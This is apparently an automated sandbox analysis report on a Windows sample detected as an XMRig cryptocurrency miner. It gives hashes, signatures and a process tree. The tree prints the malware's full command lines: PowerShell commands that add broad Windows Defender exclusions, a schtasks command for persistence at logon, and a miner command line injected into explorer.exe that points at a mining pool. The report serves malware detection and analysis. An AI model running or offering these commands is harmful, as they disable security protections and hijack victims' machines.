Analysis
-
max time kernel
106s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 22:13
Static task
static1
Behavioral task
behavioral1
Sample
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
Resource
win7-20240903-en
General
-
Target
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
-
Size
2.1MB
-
MD5
9bc40b0890e81c429b325727e5ba5893
-
SHA1
a7561d62b00391fc996ee244bba8069ed3dd6bdb
-
SHA256
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344
-
SHA512
f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f
-
SSDEEP
49152:GvQUiuvKem70245BBqhM85yYESmScKCgwm8f63tk5LwjVg:GvQUhkz6HG5pESmSN9A4k9KVg
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/4732-78-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-77-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-82-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4732-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 1376 powershell.exe 3428 powershell.exe 4524 powershell.exe 4396 powershell.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid Process 768 services64.exe 448 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid Process procid_target PID 4012 set thread context of 4732 4012 conhost.exe 115 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepid Process 2876 conhost.exe 1376 powershell.exe 1376 powershell.exe 3428 powershell.exe 3428 powershell.exe 4012 conhost.exe 4012 conhost.exe 4524 powershell.exe 4524 powershell.exe 4396 powershell.exe 4396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exeexplorer.exedescription pid Process Token: SeDebugPrivilege 2876 conhost.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 4012 conhost.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeLockMemoryPrivilege 4732 explorer.exe Token: SeLockMemoryPrivilege 4732 explorer.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exesihost64.exedescription pid Process procid_target PID 4108 wrote to memory of 2876 4108 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 95 PID 4108 wrote to memory of 2876 4108 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 95 PID 4108 wrote to memory of 2876 4108 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 95 PID 2876 wrote to memory of 2620 2876 conhost.exe 96 PID 2876 wrote to memory of 2620 2876 conhost.exe 96 PID 2620 wrote to memory of 1376 2620 cmd.exe 98 PID 2620 wrote to memory of 1376 2620 cmd.exe 98 PID 2876 wrote to memory of 3244 2876 conhost.exe 99 PID 2876 wrote to memory of 3244 2876 conhost.exe 99 PID 3244 wrote to memory of 1196 3244 cmd.exe 101 PID 3244 wrote to memory of 1196 3244 cmd.exe 101 PID 2620 wrote to memory of 3428 2620 cmd.exe 102 PID 2620 wrote to memory of 3428 2620 cmd.exe 102 PID 2876 wrote to memory of 3120 2876 conhost.exe 103 PID 2876 wrote to memory of 3120 2876 conhost.exe 103 PID 3120 wrote to memory of 768 3120 cmd.exe 105 PID 3120 wrote to memory of 768 3120 cmd.exe 105 PID 768 wrote to memory of 4012 768 services64.exe 109 PID 768 wrote to memory of 4012 768 services64.exe 109 PID 768 wrote to memory of 4012 768 services64.exe 109 PID 4012 wrote to memory of 2536 4012 conhost.exe 110 PID 4012 wrote to memory of 2536 4012 conhost.exe 110 PID 2536 wrote to memory of 4524 2536 cmd.exe 112 PID 2536 wrote to memory of 4524 2536 cmd.exe 112 PID 4012 wrote to memory of 448 4012 conhost.exe 113 PID 4012 wrote to memory of 448 4012 conhost.exe 113 PID 2536 wrote to memory of 4396 2536 cmd.exe 114 PID 2536 wrote to memory of 4396 2536 cmd.exe 114 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 4012 wrote to memory of 4732 4012 conhost.exe 115 PID 448 wrote to memory of 4500 448 sihost64.exe 117 PID 448 wrote to memory of 4500 448 sihost64.exe 117 PID 448 wrote to memory of 4500 448 sihost64.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1196
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:4500
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=806⤵
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52979eabc783eaca50de7be23dd4eafcf
SHA1d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA51292bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba
-
Filesize
944B
MD5dd1d0b083fedf44b482a028fb70b96e8
SHA1dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA51296bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973
-
Filesize
944B
MD55fbb56518e82d1b1e5ef6be3b6693880
SHA14e7671d0193b6f640d81b3fb91ac17ca67e0632b
SHA256760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40
SHA512ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD59bc40b0890e81c429b325727e5ba5893
SHA1a7561d62b00391fc996ee244bba8069ed3dd6bdb
SHA256ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344
SHA512f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f
-
Filesize
32KB
MD5703bba1d6c5595dcd7cbc5e34ed2ae33
SHA14c4e251addaf23f55350a8f1227d239d12aba92e
SHA25628f55ece940bf306a301835f5500498f5ef552d0f57ca988b01ee0b584128619
SHA5123c94a83a1f77b04eb91fbad142b965ca5c3bf6073e67314272aece6cd347b53f340f26aad34ba80ba65b26e186539e0327e6acd429ab6540d3eeada70199863a